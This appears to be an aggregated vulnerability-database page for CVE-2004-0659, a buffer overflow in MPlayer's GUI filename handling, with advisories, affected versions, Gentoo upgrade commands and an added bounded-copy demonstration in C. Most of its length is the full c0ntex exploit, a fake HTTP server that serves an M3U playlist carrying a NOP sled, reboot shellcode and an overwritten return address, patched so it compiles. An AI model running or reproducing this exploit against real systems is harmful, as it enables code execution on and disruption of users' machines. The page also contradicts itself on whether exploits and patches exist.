CVE-2004-0659
CVSS 10.0
Published: 2004-08-06 00:00:00
Revised: 2016-10-17 22:47:18

[Original] Buffer overflow in TranslateFilename for common.c in MPlayer 1.0pre4 allows remote attackers to execute arbitrary code via a long file name.


[CNNVD] MPlayer GUI File Name Buffer Overflow Vulnerability (CNNVD-200408-073)

        
        MPlayer is a Linux-based movie player.
        The GUI build of MPlayer does not adequately check the length of externally supplied file names. A remote attacker can exploit this to overflow a buffer in MPlayer and potentially execute arbitrary instructions with the privileges of the user running the process.
        An attacker constructs a malicious file (in practice a playlist whose entry is an overlong file name) and lures a user of the GUI build of MPlayer into opening it; when the application copies the file name string into a fixed-size buffer, the buffer overflows, and carefully crafted data may execute arbitrary instructions with the privileges of the user process.
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:mplayer:mplayer:head_cvs
cpe:/a:mplayer:mplayer:0.92.1
cpe:/a:mplayer:mplayer:0.92_cvs
cpe:/a:mplayer:mplayer:0.90_pre
cpe:/a:mplayer:mplayer:0.90_rc4
cpe:/a:mplayer:mplayer:0.90_rc
cpe:/a:mplayer:mplayer:1.0_pre4
cpe:/a:mplayer:mplayer:1.0_pre3
cpe:/a:mplayer:mplayer:0.90
cpe:/a:mplayer:mplayer:1.0_pre2
cpe:/a:mplayer:mplayer:1.0_pre1
cpe:/a:mplayer:mplayer:0.92
cpe:/a:mplayer:mplayer:0.91
cpe:/a:mplayer:mplayer:1.0_pre3try2

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0659
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0659
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-073
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=108844316930791&w=2
(UNKNOWN)  BUGTRAQ  20040627 MPlayer MeMPlayer.c
http://www.gentoo.org/security/en/glsa/glsa-200408-01.xml
(UNKNOWN)  GENTOO  GLSA-200408-01
http://www.securityfocus.com/bid/10615
(VENDOR_ADVISORY)  BID  10615
http://xforce.iss.net/xforce/xfdb/16532
(VENDOR_ADVISORY)  XF  mplayer-common-bo(16532)

- Vulnerability information

MPlayer GUI File Name Buffer Overflow Vulnerability
Critical  Boundary condition error
2004-08-06 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        Vendor patch:
        MPlayer
        -------
        At the time of this record the vendor had not released a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version (the OSVDB and Gentoo entries further down this page record a fix in MPlayer CVS and in Gentoo's media-video/mplayer-1.0_pre4-r7):
        
        http://www.mplayerhq.hu/homepage/design6/news.html

- Vulnerability information (308)

MPlayer <= 1.0pre4 GUI filename handling Overflow Exploit (EDBID:308)
linux remote
2004-07-04 Verified
0 c0ntex
N/A
/*
  c0ntex open-security org

  Listens as a fake HTTP server. When an MPlayer GUI client connects, it
  answers with an m3u playlist whose single entry is a 544-byte "file name":
  NOP sled + shellcode + return address, sized to land on the saved EIP when
  the GUI copies the name into guiIntfStruct.Filename.
 */

#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>


#define SUCCESS 0 /* True */
#define FAILURE 1 /* False */


#define A_BANNER "_MPlayer_MeMPlayer_Media_Mayhem_"
#define ALIGN   0                       /* Stack address alignment */
#define BUFFER  544                     /* Exactly overwrite EIP */
#define EIPWRT  4                       /* Byte count for overwrite */
#define NOP     0x90                    /* NoOp padding */
#define OFFSET  0                       /* Offset from retaddr */
#define PORT    80                      /* Listener port */
#define RETADDR 0xbfffcb9c              /* Remote return address (32-bit x86 stack) */
#define THREAT  "MPlayer/1.0pre4-3.2.2" /* Latest vulnerable version */


/* The two usage strings were broken across lines in the original listing;
 * joined here so the file compiles. */
#define example() fprintf(stderr, "Usage: ./memplayer -a <align_val> -o <offset_val>\n\n")
#define looking() fprintf(stderr, "I'm looking for projects to work on, mail me if you have something\n\n")


unsigned int i;
char payload[BUFFER + 1];       /* +1 keeps a terminating NUL so strlen()/send() stop at BUFFER */

void banner(void);
void die(char *ohnn);

int pkg_prep(int clisock_fd, int align, int offset);
int pkg_send(int clisock_fd, char *payload);
int main(int argc, char **argv);


/* Minimal HTTP response; the audio/x-mpegurl type makes MPlayer parse the
 * body as an m3u playlist. */
char *http[] = {
        "HTTP/1.0 200 OK\r\n",
        "Date: Thu, 01 Jun 2004 12:52:15 GMT\r\n",
        "Server: MemPlayer/1.0.3 (Linux)\r\n",
        "MIME-version: 1.0\r\n",
        "Content-Type: audio/x-mpegurl\r\n",
        "Content-Length: 666\r\n",
        "Connection: close\r\n",
        "\r\n"
};


/* "#EXTM3U\r\n" and "#EXTINF:.,Open-Security.Rocks\r\n": a playlist header,
 * so the line that follows is taken as a file name. */
char *m3umuxor[] = {
        "\x23\x45\x58\x54\x4D\x33\x55\r\n",
        "\x23\x45\x58\x54\x49\x4E\x46\x3A"
        "\x2E\x2c\x4F\x70\x65\x6E\x2D\x53"
        "\x65\x63\x75\x72\x69\x74\x79\x2E"
        "\x52\x6F\x63\x6B\x73\r\n",
        "\r\n"
};


/* Linux/x86 shellcode, 59 bytes, no NUL bytes:
 *   setuid(0); sync(); sync();
 *   reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2, LINUX_REBOOT_CMD_RESTART);
 *   exit(0);
 * i.e. the PoC reboots the victim; reboot() only succeeds if MPlayer runs as root. */
char opcode[] = {
        0x31,0xc0,0x89,0xc3,0xb0,0x17,0xcd,0x80,0x31,0xc0,0x89,0xc3,
        0xb0,0x24,0xcd,0x80,0x31,0xc0,0x89,0xc3,0xb0,0x24,0xcd,0x80,
        0x31,0xc0,0x89,0xc3,0x89,0xc1,0x89,0xc2,0xb0,0x58,0xbb,0xad,
        0xde,0xe1,0xfe,0xb9,0x69,0x19,0x12,0x28,0xba,0x67,0x45,0x23,
        0x01,0xcd,0x80,0x31,0xc0,0x89,0xc3,0xfe,0xc0,0xcd,0x80
};


void
banner(void)
{
        fprintf(stderr, "\n  ** MPlayer_Memplayer.c - Remote exploit demo POC **\n\n");
        fprintf(stderr, "[-] Uses m3u header reference to make MPlayer think it has a\n");
        fprintf(stderr, "[-] valid media file then crafted package is sent, overflows\n");
        fprintf(stderr, "[-] the guiIntfStruct.Filename buffer && proves exploit POC.\n");
        fprintf(stderr, "[-] c0ntex open-security org {} http://www.open-security.org  \n\n");
}


void
die(char *err_trap)
{
        perror(err_trap);
        fflush(stderr);
        _exit(1);
}


int
pkg_prep(int clisock_fd, int align, int offset)
{
        ssize_t recv_chk;
        uint32_t retaddr;

        char chk_vuln[512];     /* was 69 bytes, too small for a request line plus User-Agent */
        char *pload = (char *) &opcode;


        retaddr = RETADDR - offset;

        fprintf(stderr, " -> Using align [%d] and offset [%d]\n", align, offset);

        memset(chk_vuln, 0, sizeof(chk_vuln));

        /* Read the client's HTTP request and look for MPlayer's User-Agent */
        recv_chk = recv(clisock_fd, chk_vuln, sizeof(chk_vuln) - 1, 0);
        if (recv_chk == -1 || recv_chk == 0) {
                fprintf(stderr, "Could not receive data from client\n");
                close(clisock_fd);
                _exit(1);
        }
        chk_vuln[recv_chk] = '\0';      /* was [recv_chk+1]: one byte past the array on a full read */

        if (strstr(chk_vuln, THREAT) || strstr(chk_vuln, "MPlayer/0")) {
                fprintf(stderr, " -> Detected vulnerable MPlayer version\n");
        } else {
                fprintf(stderr, " -> Detected a non-MPlayer connection, end.\n");
                close(clisock_fd);
                _exit(1);
        }

        fprintf(stderr, " -> Payload size to send is [%d]\n", BUFFER);
        fprintf(stderr, " -> Sending evil payload to our client\n");

        memset(payload, 0, sizeof(payload));

        /* Bytes 540..543 of the name overwrite the saved return address.
         * Written with a 4-byte memcpy rather than *(long *) so the layout is
         * the same on a 64-bit build host. */
        for (i = (BUFFER - EIPWRT); i < BUFFER; i += 4)
                memcpy(&payload[i], &retaddr, EIPWRT);

        /* NOP sled, then the shellcode, ending right before the return address */
        for (i = 0; i < (BUFFER - sizeof(opcode) - EIPWRT); ++i)
                payload[i] = NOP;

        /* opcode[] is not NUL-terminated, so sizeof(), not strlen() */
        memcpy(payload + i, pload, sizeof(opcode));

        payload[BUFFER] = 0x00;         /* was payload[545]: one past the array */

        return SUCCESS;
}


int
pkg_send(int clisock_fd, char *payload)
{
        for (i = 0; i < 8; i++)
                if (send(clisock_fd, http[i], strlen(http[i]), 0) == -1)
                        die("Could not send HTTP header");
        fprintf(stderr, "\t- Sending valid HTTP header..\n");
        sleep(1);

        for (i = 0; i < 3; i++)
                if (send(clisock_fd, m3umuxor[i], strlen(m3umuxor[i]), 0) == -1)
                        die("Could not send m3u header");
        fprintf(stderr, "\t- Sending valid m3u header..\n");
        sleep(1);

        if (send(clisock_fd, payload, strlen(payload), 0) == -1)
                die("Could not send payload");
        fprintf(stderr, "\t- Sending payload package..\n");

        return SUCCESS;
}


int
main(int argc, char **argv)
{
        unsigned int align = 0, offset = 0, reuse = 1;
        unsigned int port = PORT;
        int opts;
        socklen_t cl_buf;               /* accept() takes socklen_t */

        int clisock_fd, sock_fd;

        struct sockaddr_in victim;
        struct sockaddr_in confess;


        if (argc < 2) {
                banner();
                example();
                _exit(1);
        }
        banner();


        while ((opts = getopt(argc, argv, "a:o:")) != -1) {
                switch (opts) {
                case 'a':
                        align = atoi(optarg);
                        break;
                case 'o':
                        offset = atoi(optarg);
                        break;
                default:
                        align = ALIGN;
                        offset = OFFSET;
                }
        }

        if ((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
                die("Could not create socket");

        if (setsockopt(sock_fd, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(int)) == -1)
                die("Could not re-use socket");

        memset(&confess, 0, sizeof(confess));

        confess.sin_family = AF_INET;
        confess.sin_port = htons(port);
        confess.sin_addr.s_addr = htonl(INADDR_ANY);

        if (bind(sock_fd, (struct sockaddr *)&confess, sizeof(struct sockaddr)) == -1)
                die("Could not bind socket");

        if (listen(sock_fd, 0) == -1)
                die("Could not listen on socket");

        printf(" -> Listening for a connection on port %d\n", port);

        cl_buf = sizeof(victim);
        if ((clisock_fd = accept(sock_fd, (struct sockaddr *)&victim, &cl_buf)) == -1)
                die("Could not accept connection");

        fprintf(stderr, " -> Action: Attaching from host[%s]\n", inet_ntoa(victim.sin_addr));

        if (pkg_prep(clisock_fd, align, offset) == FAILURE) {
                fprintf(stderr, "Could not prep package\n");
                _exit(1);
        }

        if (pkg_send(clisock_fd, payload) == FAILURE) {
                fprintf(stderr, "Could not send package\n");
                _exit(1);
        }
        sleep(2);

        fprintf(stderr, " -> Test complete\n\n");

        close(clisock_fd);
        looking();

        return SUCCESS;
}


// milw0rm.com [2004-07-04]

- Vulnerability information

7282
MPlayer GUI TranslateFilename Overflow
Local Access Required, Remote / Network Access, Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

An overflow exists in the TranslateFilename function in Gui/mplayer/common.c of MPlayer. MPlayer fails to verify the length of the guiIntfStruct.Filename variable, resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code, resulting in a loss of integrity.
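The description above (and the CNNVD summary earlier on this page) states the flaw in one line: TranslateFilename copies guiIntfStruct.Filename into a fixed buffer without checking its length, and the c0ntex PoC reproduced above delivers a 544-byte name as the single entry of an HTTP-served M3U playlist. The C program below is an added example written for this page, not MPlayer's code and not the exploit author's: it puts the unbounded-copy pattern beside a bounded replacement and runs a constructed playlist with one benign entry and one 544-byte entry through the bounded copy. The 256-byte FILENAME_BUF, the function names and the playlist text are assumptions chosen for illustration, not MPlayer's actual layout.

```c
/* Added example for this page (not MPlayer code, not the c0ntex PoC): the
 * unbounded-copy pattern behind CVE-2004-0659 next to a bounded version,
 * driven by an M3U playlist of the shape the PoC serves. FILENAME_BUF, the
 * function names and the playlist text are assumptions for illustration. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define FILENAME_BUF 256   /* assumed size of the fixed Filename buffer */
#define EXPLOIT_LEN  544   /* name length the PoC sends (BUFFER in the exploit) */

/* Mirrors the vulnerable pattern: copies however many bytes the name has.
 * Kept only for comparison; never feed it an untrusted name. */
static void translate_filename_unsafe(char *dst, const char *src)
{
        strcpy(dst, src);
}

/* Bounded version: a name that does not fit (NUL included) is rejected and
 * dst is left untouched, so the caller cannot silently open a truncated
 * path either. Returns 0 on success, -1 if src would overflow dst. */
int translate_filename_safe(char *dst, size_t dstlen, const char *src)
{
        size_t n = strlen(src);

        if (dstlen == 0 || n >= dstlen)
                return -1;
        memcpy(dst, src, n + 1);
        return 0;
}

/* Convenience for checks: 1 if src is accepted into an 8-byte buffer. */
int fits_in_eight(const char *src)
{
        char buf[8];

        return translate_filename_safe(buf, sizeof buf, src) == 0;
}

/* Walk an M3U body line by line and push every non-directive line through
 * the bounded copy into a FILENAME_BUF-byte buffer, the step the GUI's
 * TranslateFilename performs without a check. Lines starting with '#'
 * (#EXTM3U, #EXTINF) and blank lines are skipped; CRLF is tolerated.
 * Returns the number of entries rejected as overlong. */
int process_playlist(const char *m3u)
{
        char filename[FILENAME_BUF];
        char entry[EXPLOIT_LEN + 64];   /* scratch for one playlist line */
        int rejected = 0;
        const char *p = m3u;

        while (*p) {
                const char *nl = strchr(p, '\n');
                size_t len = nl ? (size_t)(nl - p) : strlen(p);

                if (len && p[len - 1] == '\r')
                        len--;
                if (len && p[0] != '#') {
                        if (len >= sizeof entry)
                                len = sizeof entry - 1;   /* bound the scratch copy too */
                        memcpy(entry, p, len);
                        entry[len] = '\0';
                        if (translate_filename_safe(filename, sizeof filename, entry) != 0)
                                rejected++;
                }
                if (!nl)
                        break;
                p = nl + 1;
        }
        return rejected;
}

/* Constructed playlist: one benign entry, then one EXPLOIT_LEN-byte entry.
 * Returns how many entries the bounded copy rejected (expected: 1). */
int demo_rejected_entries(void)
{
        static char body[EXPLOIT_LEN + 128];
        char name[EXPLOIT_LEN + 1];
        char filename[FILENAME_BUF];

        memset(name, 'A', EXPLOIT_LEN);
        name[EXPLOIT_LEN] = '\0';
        snprintf(body, sizeof body,
                 "#EXTM3U\r\n#EXTINF:-1,constructed\r\n"
                 "http://example.invalid/ok.avi\r\n%s\r\n", name);

        /* The unbounded copy is exercised only with a name that fits. */
        translate_filename_unsafe(filename, "short.avi");

        return process_playlist(body);
}

int main(void)
{
        printf("overlong playlist entries rejected: %d\n", demo_rejected_entries());
        return 0;
}
```

Build with `cc -Wall -o m3ucheck m3ucheck.c` and run it; it reports one rejected entry. The bounded version rejects instead of truncating on purpose: a silently truncated path would still be handed to the player, whereas a rejection tells the caller the playlist entry is hostile and is the signal a GUI should surface rather than hide.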

- Timeline

2004-06-27 Unknown
2004-06-27 Unknown

- Solution

Upgrade to the version in CVS, which has been reported to fix this vulnerability. It is also possible to correct the flaw by applying the patch in the original advisory, or to work around it by recompiling MPlayer without GUI support.

- References

- Credit
- Vulnerability information

MPlayer GUI File Name Buffer Overflow Vulnerability
Boundary Condition Error  10615
Remote: Yes  Local: No
2004-06-28 12:00:00 2009-07-12 05:16:00
Discovery of this issue is credited to c0ntex <c0ntex@open-security.org>.

- Affected program versions

MPlayer MPlayer 1.0 pre4
MPlayer MPlayer 1.0 pre3try2
MPlayer MPlayer 1.0 pre3
MPlayer MPlayer 1.0 pre2
MPlayer MPlayer 1.0 pre1
MPlayer MPlayer 0.92.1
MPlayer MPlayer 0.92
MPlayer MPlayer 0.91
+ Mandriva Linux Mandrake 9.2
MPlayer MPlayer 0.90 rc series
MPlayer MPlayer 0.90 pre series
MPlayer MPlayer 0.90
MPlayer MPlayer 0.90 rc4
+ Mandriva Linux Mandrake 9.1
MPlayer MPlayer HEAD CVS
MPlayer MPlayer 0_92 CVS

- Vulnerability discussion

It has been reported that MPlayer when used with the graphical user interface (GUI) is affected by a buffer overflow vulnerability. This issue is due to a failure of the application to properly handle user-supplied strings when copying them into finite buffers.

Successful exploitation would immediately produce a denial of service condition in the affected process. This issue may also be leveraged to execute code on the affected system within the security context of the user running the vulnerable process.

- Exploit

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- Solution

Gentoo has released advisory GLSA 200408-01 dealing with this issue. All MPlayer users should upgrade to the latest version:

# emerge sync

# emerge -pv ">=media-video/mplayer-1.0_pre4-r7"
# emerge ">=media-video/mplayer-1.0_pre4-r7"

For more information please see the referenced vendor advisory.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- References
